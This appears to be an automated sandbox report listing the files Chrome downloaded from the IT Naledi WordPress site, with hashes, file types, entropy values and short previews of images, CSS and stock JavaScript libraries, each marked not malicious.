                                                                                                                      SHA-512:B16913C229C1C5A85C9C01F54278120474DB1C4227DB19E502208D9B53A887BDE4F063FE88B2A96179250DEBEDFEAA7C56CB28BC5268455DFD6D6EABC8721CF0
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/03/axis.jpg
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d................7...O......$C............................................................................................................................................J.J........................................................................................0..5. @..P..!1A#4%........................!.1Qq".Aa...2..4 0..BRr..#3s..@..bC....$........................................!1.A 0Qaq..@....P..................................................................................................................................................................................................................................!s.L..7...........>..{.z{.......".G.mMX*......x.y.l.nG...........1s.@7..6......<.=:f...........;.f....[.."...K..(.Y...Y..Gd.YZ.SG`..4.......J...y.>....mY..cI.=.7.J..{MH...$.n..B.&..'.nM....A.h.r.T...;....T....N...Z..B...$.n..*k....q..(.....r.Y...R...l.@.%Cr...f.....$.n...9s.Ae..4....Qs].....Z..L...y..L..j
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (10696)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):11846
                                                                                                                      Entropy (8bit):5.9594611119007945
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:2IGIsmhP7LK1+UbNFa2m5+F3qFfxxMFFMF6P76aSXH/qFhilfETShPcx3BfMFX0B:lVsmM+mNFa2m5+F3ATo/P76aSXH/Oilq
                                                                                                                      MD5:ED87BB92069543115FCFBA851773CB4D
                                                                                                                      SHA1:40D05E000C8FA2A4AB555A3352518445E5A3C571
                                                                                                                      SHA-256:08B8652FD0A85E7D19E5F9838449320A6EE610E99FBA4BE0FEC1086169FF9519
                                                                                                                      SHA-512:4BEB5877458ECD7037951599B5D05085F3B4ECF1A560CB4860C2EE48911679397029FE393FDC51CEAD63CA8EDE751F5A5075E39D346FC6A629F57746FE0FAF17
                                                                                                                      Malicious:false
                                                                                                                      Preview:..window.google = window.google || {};.google.maps = google.maps || {};.(function() {. var rules = {. createHTML: function(src) {. return src;. },. createScriptURL: function(src) {. return src;. }. };. var ttPolicy;. . try {. ttPolicy = window.trustedTypes.createPolicy('google-maps-api-loader', rules);. } catch(e) {. ttPolicy = rules;. }. . function getScript(src) {. var a, nonce = ((a = document.querySelector("script[nonce]")) == null ? void 0 : a.nonce) || "";. var s = document.createElement('script');. . s.src = ttPolicy.createScriptURL(src);. s.nonce = nonce;. document.head.appendChild(s);. }. . var modules = google.maps.modules = {};. google.maps.__gjsload__ = function(name, text) {. modules[name] = text;. };. . google.maps.Load = function(apiLoad) {. delete google.maps.Load;. apiLoad([0.009999999776482582,[null,[["https://khms0.googleapis.com/kh?v=991\u0026hl=en-US\u0026","https://khms1.googleapis.com/kh?v=991\
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (21992), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):21992
                                                                                                                      Entropy (8bit):5.2445694269529195
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:zRm+PaU0SkukZdjjqsCkskPDJoIRnK6mMJiUdAIgFZFMqUlAUZ2nxHMfAATAvNzd:VDJ83inxOVbKXltutfOepNrGax8Wm
                                                                                                                      MD5:4077A68DDFB55E79B9B14FA83EC143EC
                                                                                                                      SHA1:EF0F8DCACFEEEFF5E7E553BFC20B9EF0831774E2
                                                                                                                      SHA-256:B64D00A7CFBDEBDDB1FB562737A1386D8F5F0574AA9EECD9AA90B7A60CEEBE7D
                                                                                                                      SHA-512:44DFB076B3141A1FFEF1D8D0DABCA99911C7455036C85837FD02E9DA64B5219CF79AC581CE4D6B2DF5E93344D36B36ACA36550D5C9B5F2FE15C3D735B94DC18A
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/themes/salient/css/build/grid-system.css?ver=15.0.6
                                                                                                                      Preview:.col{position:relative;display:block;width:100%}.full-page-inner>.container>.span_12,.full-page-inner>.span_12,html body .vc_row-fluid>.span_12{display:flex;display:-ms-flexbox;-ms-flex-wrap:wrap;flex-wrap:wrap;float:none}@media (min-width:690px){.col{margin-right:2%}}.col:last-child{margin-right:0}.col.col_last{margin-right:0}.compose-mode .vc_row-fluid>.span_12>.vc_element,.compose-mode .vc_row-fluid>.span_12>.vc_element>.wpb_column,.full-page-inner>.container>.span_12>.wpb_column,.full-page-inner>.span_12>.wpb_column,html body .vc_row-fluid>.span_12>.wpb_column{float:none;margin-right:0}.compose-mode #nectar_fullscreen_rows .full-page-inner>.container>.span_12>.vc_element:not([class*=offset-]),.compose-mode .vc_row-fluid>.span_12>.vc_element:not([class*=offset-]),.compose-mode .vc_row-fluid>.span_12>.vc_element>.wpb_column:not([class*=offset-]),.full-page-inner>.container>.span_12>.wpb_column:not([class*=offset-]),.full-page-inner>.span_12>.wpb_column:not([class*=offset-]),html body
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):12913
                                                                                                                      Entropy (8bit):7.807110482693483
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:YnCX/Ll0yEwbJjU8fvqG09WHIusGgHuDsUV:Ys6gUaq9+gODs8
                                                                                                                      MD5:C33FE715477ABBF9D626B0B55B5CF87F
                                                                                                                      SHA1:F985608CB8B66B970AA97345207676A0804B0976
                                                                                                                      SHA-256:3BAAD5A2DF73D159F155887A898D12D3E01185A69028C69D463E620F87432386
                                                                                                                      SHA-512:8483EF3FF54903E9940150FC4ACC4D696A792B268F6C8D6F3E85EC96BACAB3F7F0E33D95984626D161A222B2840F796C9DF06F979575220F02A5C707C59ADECC
                                                                                                                      Malicious:false
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d.......................#...2o............................................................................................................................................J.J......................................................................................@..1.. 0!2.4P"5.........................!Q.@1Aaq....."2b.#s. 0.r..BR3P..S.$.................P..!. .Qq0`.....................1!.@AQaq.... 0...P.......................................................................................................................................>~..9...^.z................8..H.......>~.YN];~=....5fU.V..9.~.}Y......l.l.......S.k...D..........}...6\.i;q....=...........E.D?^I.=x.#Zs.2.....L.W^Z>.z....z^wb...u.......9..........`{..7..^......H8w..../;.zuo+.......J..'...Y.u...y^.'.|...z..}.........o...I.-....5C.d....}...:?..j......B........>.t??|;fI.........k`........y.VX........"5...._DX......rOk..nxi.f..4X....,......./..]........
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (11602)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):11753
                                                                                                                      Entropy (8bit):5.2003114365902015
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:W2xabEmE7km1dEhMaGqyS8SNWiwZmDFoM7w:rx6EmeksrNqX8dtmFf7w
                                                                                                                      MD5:525DF8133DC03CE6B7FB7CD017FE0EE0
                                                                                                                      SHA1:BBC596B7E054B02DF1C52D67D903F5202D3B4146
                                                                                                                      SHA-256:18949282236C58479862223954873F216B247953AAA1FAFD5F270CDD304C05E4
                                                                                                                      SHA-512:29ABDF382F64ABB48225507141FF9F92A95EB2B67E59A7CDE234F6BC438DAAF6A98C9279F31A77E5D6A3EE3568B710AE1522182202079EDBB279403C27BA5FC8
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/themes/salient/js/build/third-party/vivus.min.js?ver=6.0.1
                                                                                                                      Preview:/**. * vivus - JavaScript library to make drawing animation on SVG. * @version v0.4.2. * @link https://github.com/maxwellito/vivus. * @license MIT. */."use strict";!function(){function t(t){if("undefined"==typeof t)throw new Error('Pathformer [constructor]: "element" parameter is required');if(t.constructor===String&&(t=document.getElementById(t),!t))throw new Error('Pathformer [constructor]: "element" parameter is not related to an existing ID');if(!(t instanceof window.SVGElement||t instanceof window.SVGGElement||/^svg$/i.test(t.nodeName)))throw new Error('Pathformer [constructor]: "element" parameter must be a string or a SVGelement');this.el=t,this.scan(t)}function e(t,e,n){r(),this.isReady=!1,this.setElement(t,e),this.setOptions(e),this.setCallback(n),this.isReady&&this.init()}t.prototype.TYPES=["line","ellipse","circle","polygon","polyline","rect"],t.prototype.ATTR_WATCH=["cx","cy","points","r","rx","ry","x","x1","x2","y","y1","y2"],t.prototype.scan=function(t){for(var e,r,n,i,a=
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (9357)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):9375
                                                                                                                      Entropy (8bit):5.399984359772224
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:KKirvjKPsO/kAvi8uErTNi7OasUrxq0G/2X8EpW7QYovE3aCn9h:KtesO/kAOErTNiSasUNqpo8EpW7QYosp
                                                                                                                      MD5:20F13F992FD02EAD68FB17893467A8B5
                                                                                                                      SHA1:8B37D46D93EB907CF0F8F95C3220EDA45387389E
                                                                                                                      SHA-256:CB225CBE89436BB47D3B4486CD9CEE63DB751CDAF60409F496253CA8BE549DAE
                                                                                                                      SHA-512:CBCBD38DC2176F280C94D561FABB45F68FDE3D0417C9D60100AD9C8360828501BE5615FDC3ACDBD3D3722C3A6327CA8B4E21590963850AE1F29C375DABAB9E62
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/plugins/salient-core/js/third-party/touchswipe.min.js?ver=1.0
                                                                                                                      Preview:/* Touch swipe */.(function(d){var m="left",l="right",c="up",s="down",b="in",t="out",j="none",o="auto",i="swipe",p="pinch",u="tap",x="horizontal",q="vertical",g="all",e="start",h="move",f="end",n="cancel",a="ontouchstart" in window,v="TouchSwipe";var k={fingers:1,threshold:75,cancelThreshold:25,pinchThreshold:20,maxTimeThreshold:null,fingerReleaseThreshold:250,swipe:null,swipeLeft:null,swipeRight:null,swipeUp:null,swipeDown:null,swipeStatus:null,pinchIn:null,pinchOut:null,pinchStatus:null,click:null,tap:null,triggerOnTouchEnd:true,triggerOnTouchLeave:false,allowPageScroll:"auto",fallbackToMouseEvents:true,excludedElements:"button, input, select, textarea, a, .noSwipe"};d.fn.swipe=function(A){var z=d(this),y=z.data(v);if(y&&typeof A==="string"){if(y[A]){return y[A].apply(this,Array.prototype.slice.call(arguments,1))}else{d.error("Method "+A+" does not exist on jQuery.swipe")}}else{if(!y&&(typeof A==="object"||!A)){return r.apply(this,arguments)}}return z};d.fn.swipe.defaults=k;d.fn.swip
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (6015), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):6015
                                                                                                                      Entropy (8bit):5.0660783489265615
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:3u/5O0TcghgZghk10IS10IPO0TT9xLggdJgdBgdZSxN2fyxnlRzAhx3pX8XtpeVH:eDnk5xn/zAX8R4kz0WlY
                                                                                                                      MD5:DEA412BFC9F38668F88EF0512A94756A
                                                                                                                      SHA1:977A7849CD25196B5B494A4D60247FA14D381F64
                                                                                                                      SHA-256:8D83CA392057CE2F22104C121CD82B0FA73F9B4F271FA40364D4332C8FDF1031
                                                                                                                      SHA-512:941854E3824B6DD1CEC15A3781C3F237DF56E55A588C86A05C211D8699449C0F42465C75925DF3DE53D19397E74BF16F9FD52D681ECA3485F69A7EE32D4A970B
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/themes/salient/css/build/elements/element-button-legacy.css?ver=15.0.6
                                                                                                                      Preview:.n-sc-button[class*=gradient]{background-color:transparent!important;opacity:1;box-shadow:none}.n-sc-button[class*=gradient]:after,.n-sc-button[class*=gradient][class*=see-through]:after{position:absolute;content:' ';top:-2%;left:-1%;width:101.5%;height:104%;transform-origin:right;-webkit-transform-origin:right;-ms-transform-origin:right;transform:scale(0,1);-webkit-transform:scale(0,1);-ms-transform:scale(0,1);-ms-transition:transform .38s cubic-bezier(.2,.95,.4,.95),background-size .38s ease;transition:transform .38s cubic-bezier(.2,.95,.4,.95),background-size .38s ease;-webkit-transition:transform .38s cubic-bezier(.2,.95,.4,.95),background-size .38s ease;z-index:-1}.n-sc-button[class*=gradient]:hover:after,.n-sc-button[class*=see-through][class*=gradient]:after{background-size:225% 100%!important;background-position:right!important}.n-sc-button[class*=gradient]:after,.n-sc-button[class*=see-through][class*=gradient]:hover:after{background-position:left!important;background-size:100
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (1633), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):1633
                                                                                                                      Entropy (8bit):4.82611705862464
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:tyW/ba/al1aMXaSnXaAprXanYXVxFVvIaLVSV5G:MW/JV
                                                                                                                      MD5:016FFE0D75BDCDD877B2BE70FF3BCD34
                                                                                                                      SHA1:9B54EE252FF61B40FB2E497DE3D410F08BD73726
                                                                                                                      SHA-256:B82196675AD81E7B7E095B923ACCDAC75A678C6AAC8B3D6D5D5E253E97891425
                                                                                                                      SHA-512:F3A7C7F0D2137B832B28E00B76759636CAEE3D59C0AB8DA5524FDDB2361D4DA16A4C0A649804AEE9ADF8980B7685B8AA2820C147BF0A0F0C4BC1382D00AFEDF4
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/themes/salient/css/build/elements/element-fancy-unordered-list.css?ver=15.0.6
                                                                                                                      Preview:.nectar-fancy-ul ul li{list-style:none;position:relative;padding-left:38px}body .nectar-fancy-ul[data-list-icon=none] ul li{padding-left:0;margin-bottom:0}.nectar-fancy-ul ul{margin-left:0}.nectar-fancy-ul ul li i,.nectar-fancy-ul ul li i.icon-default-style{position:absolute;left:0;top:0;width:20px}.nectar-fancy-ul ul li .icon-default-style[class^=icon-]{font-size:16px;height:100%;line-height:22px}.nectar-fancy-ul ul li i.icon-default-style[class^=icon-].icon-salient-thin-line{font-size:27px;height:27px;line-height:27px}.main-content .nectar-fancy-ul[data-spacing="5px"] ul li{margin-bottom:5px}.main-content .nectar-fancy-ul[data-spacing="10px"] ul li{margin-bottom:10px;line-height:1.3em}.main-content .nectar-fancy-ul[data-spacing="15px"] ul li{margin-bottom:15px;line-height:1.3em}.main-content .nectar-fancy-ul[data-spacing="20px"] ul li{margin-bottom:20px;line-height:1.3em}.main-content .nectar-fancy-ul[data-spacing="25px"] ul li{margin-bottom:25px;line-height:1.3em}.nectar-fancy-ul[da
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):9889
                                                                                                                      Entropy (8bit):7.705292156928488
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ffZPEH/D6Rx7Al6b5RZ21WHr42G4NXXSLjoIJ:fxa/DKil6bE1grnhXesIJ
                                                                                                                      MD5:BB4C2C8475806358DE7D7E0299E5BE26
                                                                                                                      SHA1:CA3746D6EE9B24D7BCDEAB6430B106F38E66E63C
                                                                                                                      SHA-256:9117E3F733BC1CC3A775563182E6B2756B29269EE48415228E69023D3DA828F2
                                                                                                                      SHA-512:BC83CEA1999C046D6FFDB0FD823FF70BD11838DDBB501C4FAF52626704641A46E61C40DF9837001722F5D7EB37B61E6EB0610730613A56F07822CAB8520E3132
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/03/is..jpg
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d....................A......&.............................................................................................................................................J.J...................................................................................... @...2.0.4P.!1".#........................@!1Q.. Aq.."2B0a...R.#3Pbr...cs....................!..0@P`1a .pqA."....................1!AQ. @aq....0..P.....................................................................................................................................'.6......s'.....@...........??X.[..>.....,.=K.o...]...g?>...........k.9..O..x..e..[.[.....O/.7:} ...........k..t.W....lYn6...i.:.O{?>.........<.t....ad.,.=Kb.q.,.,...0...O.............?....2...-.-.....-.......`.........??...t.,.=Kb.q.,.,...b.l_..^....^.9............{..[...e...[._Qe.q.,./.........2.......8....3.Kc./...I..C..p..1~.r.....Ww)....{CC...[/.....8........p...d....e.=n.g.....>_[....
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):12913
                                                                                                                      Entropy (8bit):7.807110482693483
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:YnCX/Ll0yEwbJjU8fvqG09WHIusGgHuDsUV:Ys6gUaq9+gODs8
                                                                                                                      MD5:C33FE715477ABBF9D626B0B55B5CF87F
                                                                                                                      SHA1:F985608CB8B66B970AA97345207676A0804B0976
                                                                                                                      SHA-256:3BAAD5A2DF73D159F155887A898D12D3E01185A69028C69D463E620F87432386
                                                                                                                      SHA-512:8483EF3FF54903E9940150FC4ACC4D696A792B268F6C8D6F3E85EC96BACAB3F7F0E33D95984626D161A222B2840F796C9DF06F979575220F02A5C707C59ADECC
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/03/chevron.jpg
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d.......................#...2o............................................................................................................................................J.J......................................................................................@..1.. 0!2.4P"5.........................!Q.@1Aaq....."2b.#s. 0.r..BR3P..S.$.................P..!. .Qq0`.....................1!.@AQaq.... 0...P.......................................................................................................................................>~..9...^.z................8..H.......>~.YN];~=....5fU.V..9.~.}Y......l.l.......S.k...D..........}...6\.i;q....=...........E.D?^I.=x.#Zs.2.....L.W^Z>.z....z^wb...u.......9..........`{..7..^......H8w..../;.zuo+.......J..'...Y.u...y^.'.|...z..}.........o...I.-....5C.d....}...:?..j......B........>.t??|;fI.........k`........y.VX........"5...._DX......rOk..nxi.f..4X....,......./..]........
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (724)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):3487
                                                                                                                      Entropy (8bit):5.374202215346524
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:rlxH0aKpBnexBie6sMoz1hABpFUvz6w2t2+lWURBzAevqBZZon:hxUaKGCaTlL6fcsdAevqBZZo
                                                                                                                      MD5:73D5EE12B407CF2AC6E81A7E63892875
                                                                                                                      SHA1:49E96EE72C74B226C79CB59A445FB6D273910845
                                                                                                                      SHA-256:8A38DCA1E6BEE52C4EBD3F101762FFE653C5E2DD934710CC01F4E8D2414EC416
                                                                                                                      SHA-512:DC87DEB927505D652E1A24F80FEA3BBBC03567932B5D53A13FA4EBF801664D0CE18352F911CF116D73B8061621572A81AC37ECFA59437C281928B059DAEBB104
                                                                                                                      Malicious:false
                                                                                                                      URL:https://maps.googleapis.com/maps-api-v3/api/js/59/1/overlay.js
                                                                                                                      Preview:google.maps.__gjsload__('overlay', function(_){var Zwa=function(){},AB=function(a){a.HA=a.HA||new Zwa;return a.HA},$wa=function(a){this.Eg=new _.Nm(()=>{const b=a.HA;if(a.getPanes()){if(a.getProjection()){if(!b.Hg&&a.onAdd)a.onAdd();b.Hg=!0;a.draw()}}else{if(b.Hg)if(a.onRemove)a.onRemove();else a.remove();b.Hg=!1}},0)},bxa=function(a,b){const c=AB(a);let d=c.Fg;d||(d=c.Fg=new $wa(a));_.Kb(c.Eg||[],_.uk);var e=c.Ig=c.Ig||new _.Xpa;const f=b.__gm;e.bindTo("zoom",f);e.bindTo("offset",f);e.bindTo("center",f,"projectionCenterQ");e.bindTo("projection",.b);e.bindTo("projectionTopLeft",f);e=c.Kg=c.Kg||new axa(e);e.bindTo("zoom",f);e.bindTo("offset",f);e.bindTo("projection",b);e.bindTo("projectionTopLeft",f);a.bindTo("projection",e,"outProjection");a.bindTo("panes",f);e=()=>_.Om(d.Eg);c.Eg=[_.sk(a,"panes_changed",e),_.sk(f,"zoom_changed",e),_.sk(f,"offset_changed",e),_.sk(b,"projection_changed",e),_.sk(f,"projectioncenterq_changed",e)];_.Om(d.Eg);b instanceof _.Wk?(_.pl(b,"Ox"),_.M(b,148440)):b
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (21124), with CRLF, LF line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):124397
                                                                                                                      Entropy (8bit):5.274989565877295
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:YYCsCVC8xbw3Smrgh0djMMQhKoD22VIKSyAsKNxsr+H+7KkFZzq9H1sdyRWLlW8m:+M+rFZ6HSrLimdbxJk
                                                                                                                      MD5:5DD9DE4007CBD662891C67B74C5DEC9D
                                                                                                                      SHA1:34F87AEEFEF724400DC8C700D8BD35BFC86FDC24
                                                                                                                      SHA-256:FC7F2D3DDE778A9FDBC7CE81069D2145B44012C225B545C5DA88B406929E5841
                                                                                                                      SHA-512:79A126107891579E0709DB81C4179C04DAC3F41A6DE3CBB19822737D3B50FCF9F9721D2E8423196471EFEB998E1B3046EDA35EC56ACBDA88DA29D852CC6E443D
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/
                                                                                                                      Preview:<!doctype html>.<html lang="en-US" class="no-js">.<head>..<meta charset="UTF-8">..<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0" /><meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' />... This site is optimized with the Yoast SEO plugin v19.11 - https://yoast.com/wordpress/plugins/seo/ -->..<title>Home - IT Naledi: Hardware &amp; software solutions in Pinelands, Cape Town</title>..<meta name="description" content="A South African ICT infrastructure outsourcing services business, IT Naledi Solutions supplies and manages a diverse range of hardware and software solutions." />..<link rel="canonical" href="https://www.itnaledi.co.za/" />..<meta property="og:locale" content="en_US" />..<meta property="og:type" content="website" />..<meta property="og:title" content="Home - IT Naledi: Hardware &amp; software solutions in Pinelands, Cape Town" />..<meta property="og:description"
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (1572)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):23176
                                                                                                                      Entropy (8bit):5.320760377206205
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:NedB0q4KfqKrbqGIwV4MHP7leA85q1bfqbrbqGIwV4RePq/euaDqPxfqxrbqGIwj:48UqY49f7qY4KFtqY414AqY4d
                                                                                                                      MD5:6EBEE786687BCAA64FCB714C20E25FE2
                                                                                                                      SHA1:13F0C3BBEAEDA59EBD1D10269437037043C3A9B3
                                                                                                                      SHA-256:43FC587D4C7860E824A47A42FC2B758455429AAF36B6EEB270D7CFB6A8975C56
                                                                                                                      SHA-512:BDF486B86BB00BB88E495D984FA28D18EF37026DBD3AB5DCC7D60FCCA4181C27414B04A81FCA95D4E0BE8A0E7D6D2FD1E3AB7AB7F065D1B6A0CE4207F8FB2653
                                                                                                                      Malicious:false
                                                                                                                      URL:https://fonts.googleapis.com/css?family=Open+Sans%3A300%2C400%2C600%2C700&subset=latin%2Clatin-ext
                                                                                                                      Preview:/* cyrillic-ext */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 300;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSKmu1aB.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 300;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSumu1aB.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 300;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSOmu1aB.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Open Sans';. font-style: normal;
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (30343)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):49935
                                                                                                                      Entropy (8bit):4.823273149899454
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:Gza+79Vdo9IKlr+Klk3Yi+fwYUf2l8yQ/e9vf:Gza2o2KlrniSUf2l7f9vf
                                                                                                                      MD5:57302B6CEC774F116A26A5E1690E7F91
                                                                                                                      SHA1:069D18F167DC68937186D69CAA58410B5820721D
                                                                                                                      SHA-256:7ADB967745932B25C31DA3EF4A92F2B8E166926A7A8476FE8C8C58FC84B95FA3
                                                                                                                      SHA-512:E51C5B6B302D87540E94436C016DAB3B8981248E591D1FAC8CA016E3B9CD234E2164FC55B651AC03DFF254E5A2482777D8E17F906C65FA238187A1A1F4E3A317
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/themes/salient/css/font-awesome-legacy.min.css?ver=4.7.1
                                                                                                                      Preview:.@font-face{..font-family:'FontAwesome';..src:url('fonts/fontawesome-webfont.eot?v=4.2');..src:url('fonts/fontawesome-webfont.eot?#iefix&v=4.2') format('embedded-opentype'),...url('fonts/fontawesome-webfont.svg#fontawesomeregular?v=4.2') format('svg'),.. url('fonts/fontawesome-webfont.woff?v=4.2') format('woff'),.. url('fonts/fontawesome-webfont.ttf?v=4.2') format('truetype');..font-weight:normal;..font-display: block;..font-style:normal;.}.i[class^="icon-"],[class*=" icon-"], i[class*="fa-"], span[class*="fa-"]{font-family:FontAwesome;font-weight:normal;font-style:normal;text-decoration:inherit;-webkit-font-smoothing:antialiased;*margin-right:.3em;}.[class^="icon-"]:before,[class*=" icon-"]:before{text-decoration:inherit;speak:none;}..icon-large:before{vertical-align:-10%;font-size:1.3333333333333333em;}.[class^="icon-"].icon-fixed-width,[class*=" icon-"].icon-fixed-width{display:inline-block;width:1.1428571428571428em;text-align:right;padding-right:0.2857142857142857em;}[class^
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (2946)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):2981
                                                                                                                      Entropy (8bit):5.174465669703351
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:Q7A9/XN5NjJE2aAOuRUUKfTGwAuw5BJmVhl2qFqyvQyOw835uuPkSEwVYql+9y5l:931Yf1AJ5m/FqyLn8pu4Zl+9y5It4yO9
                                                                                                                      MD5:492F2C1A7EA7EB83FE42E0FF7CB51AA2
                                                                                                                      SHA1:DB36A77F6AAA2063BFBEC02C2C0E967438C5A245
                                                                                                                      SHA-256:E174A58A503AB84B3D1B9DE12FD3895788204485170F1289E445F7B5B98EC789
                                                                                                                      SHA-512:EEE6A1C268A519F4F281B2D76B5193BB068E94D1410372EF062587888589E139B20BB635E2331E97C857D7D835E9372F50822C5DAED29B139AB91FF5633C7A7F
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-includes/js/comment-reply.min.js?ver=6.1.7
                                                                                                                      Preview:/*! This file is auto-generated */.window.addComment=function(v){var I,C,h,E=v.document,b={commentReplyClass:"comment-reply-link",commentReplyTitleId:"reply-title",cancelReplyId:"cancel-comment-reply-link",commentFormId:"commentform",temporaryFormId:"wp-temp-form-div",parentIdFieldId:"comment_parent",postIdFieldId:"comment_post_ID"},e=v.MutationObserver||v.WebKitMutationObserver||v.MozMutationObserver,r="querySelector"in E&&"addEventListener"in v,n=!!E.documentElement.dataset;function t(){d(),e&&new e(o).observe(E.body,{childList:!0,subtree:!0})}function d(e){if(r&&(I=g(b.cancelReplyId),C=g(b.commentFormId),I)){I.addEventListener("touchstart",l),I.addEventListener("click",l);function t(e){if((e.metaKey||e.ctrlKey)&&13===e.keyCode)return C.removeEventListener("keydown",t),e.preventDefault(),C.submit.click(),!1}C&&C.addEventListener("keydown",t);for(var n,d=function(e){var t=b.commentReplyClass;e&&e.childNodes||(e=E);e=E.getElementsByClassName?e.getElementsByClassName(t):e.querySelectorA
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (6273), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):6273
                                                                                                                      Entropy (8bit):4.900607782767638
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:WozS60B6m6Tt3MMArr1suG9GqZSD4OV16QKY1f2taCYBt4xxU:WREt3pArr1suSfZhXsyaZt4xxU
                                                                                                                      MD5:E1ACCD02B0B968F54D170BBCB3568836
                                                                                                                      SHA1:DB89AB4D0085CDADBAE6B693A1838E5EFC96FD56
                                                                                                                      SHA-256:EC75DA813D229DAAE40434291FF4B8C51875C66A810B3EB5A54D71E20A01AB4E
